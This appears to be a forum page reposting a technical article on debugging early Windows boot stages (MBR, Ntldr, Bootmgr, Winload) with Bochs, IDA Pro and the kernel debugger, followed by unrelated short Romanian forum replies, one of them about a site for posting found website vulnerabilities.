following settings to enable a GUI debugger. ---- display_library: win32, options="gui_debug" ---- Although the GUI debugger works perfectly fine, it is far better to use IDA Pro if you have. Here is an article about this process by HeyRays, but in a nutshell, you can follow these steps: Download a file mentioned in the article. Copy mbr.py to the same directory as a location of the hard disk image file. Download and copy this batch file to the same directory (you will need to change paths in it). Run the batch file. You will see IDA Pro breaks at the very beginning of MBR (0x7c00) unless there is an error in configurations. Now, you can trace the code and should be able to debug VBR as well. [h=4]Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] Although it is totally possible to trace the code until it reaches to Ntldr or Bootmgr, it can be time consuming. One solution is to modify their entry point code with a breakpoint. Luckily, offset 0 of these files are actually entry points, so we can change offset 0 to a breakpoint. Here is an original entry point of Ntldr. Also, as we are using a flat hard disk image file, we can search code pattern of Ntldr or Bootmgr from the image file and change it. In my case, Ntldr was found at offset 0x133D55E00 in the image file. Like the above image, you will probably need to install a magic_break provided by Bochs rather than regular 0xCC since the runtime environment is different from usual, the protected mode. Bochs treats an instruction 'xchg bx, bx' (0x87 0xdb) as a breakpoint when the following statement was added to the bochsrc. ---- magic_break: enabled=1 ---- Once you boot the virtual machine with Bochsdbg.exe, you should see the VM breaks at 0x2:0002. 0x2:0000 is the actual breakpoint which we have set. You can look an IDA to find where to go from here. In my case, the execution need to go to 0x01d8. Then you can change EIP with a 'set $eip = 0x01d8' command and step in with a 's' command to execute a regular code sequence. Note that my Old IDA Pro (v6.0) did not stop when execution reached at a magic_breakpoint, but this issue may have already been solved on the latest version of IDA. [h=4][/h] [h=4]Ntldr (Protected-Mode)[/h] Steps for debugging Ntldr (Protected-mode) is relatively straightforward: Download and extract Ntldr of the checked build version. Open the extracted Ntldr with a hex editor and find an 'MZ' header in it. Copy all contents after that and save it on a debugger system. We assume that you saved it as E:\osloader.exe in this article. This part contains protected mode code of Ntldr. Overwrite existing C:\ntldr with the extracted Ntldr (not osloader.exe). Add the following [debug] section in boot.ini. ---- [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [debug] /debug /debugport=COM1: /baudrate=115200 /debugstop [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (Debug)" /noexecute=optin /fastdetect /debug /debugport=COM1: /baudrate=115200 ---- Once you reboot the debugee XP system, it waits to be connected by a kernel debugger. In order to load symbols and suppress error messages, you can manually read an osloader.exe image. ---- kd> .readmem E:\osloader.exe 0x400000 L0x1000 Reading 1000 bytes.. kd> .imgscan /l /r 00400000 MZ at 00400000 - size 80000 Name: osloader.EXE Loaded osloader.EXE module ---- Now, you are free to see how Ntoskrnl.exe and boot drivers are initialized. [h=4]Bootmgr (Protected-Mode)[/h] Bootmgr is called the boot manager and responsible for listing a boot menu and firing up an appropriate program according to a user's selection in the list. Unlike debugging Ntldr, you can activate the boot manager debugger with the following commands. ---- bcdedit /bootdebug {bootmgr} on ---- Fore more details, you can consult MSDN, BCDEdit /bootdebug. Note that the executable file is located in C:\Windows\Boot\PCAT\bootmgr and contains a 32bit PE image as with Ntldr. [h=4]Winload.exe[/h] Winload.exe is called the boot loader and used for the regular boot procedure. It basically loads Ntoskrnl.exe and some other boot drivers. Enabling the boot loader debugger can be simply done with bcdedit like the case of Bootmgr. ---- bcdedit /bootdebug on ---- [h=4][/h] [h=3]Further Research[/h] Difference in Windows 10. When the processor mode is changed to the long mode on the x64 system. QEMU may be better in terms of installing OSs in it. Sursa: Satoshi's note: Debugging Early Boot Stages of Windows

Da. @Gecok @ ENCODED - Ceva idei? Dam de beut.

Sugestie: afiseaza si tu ceva inainte de a te inregistra, gen "Ultimele adaugate". Adica daca cineva nu e logat vede doar formularul de login si nu stie despre ce e vorba => o sa Alt + F4. Nota: Daca vrei sa vinzi asa ceva, trebuie sa le VERIFICI. Si asta inseamna ca cei care cumpara de pe site trebuie sa aiba incredere in tine. "Vii si iti pui site-ul in db si ai acces la toate vulnerabilitatile gasite in el" - Atunci cum e, ca "atacator", sa vin sa postez vulnerabilitati gasite, cand owner-ul le vede si le repara?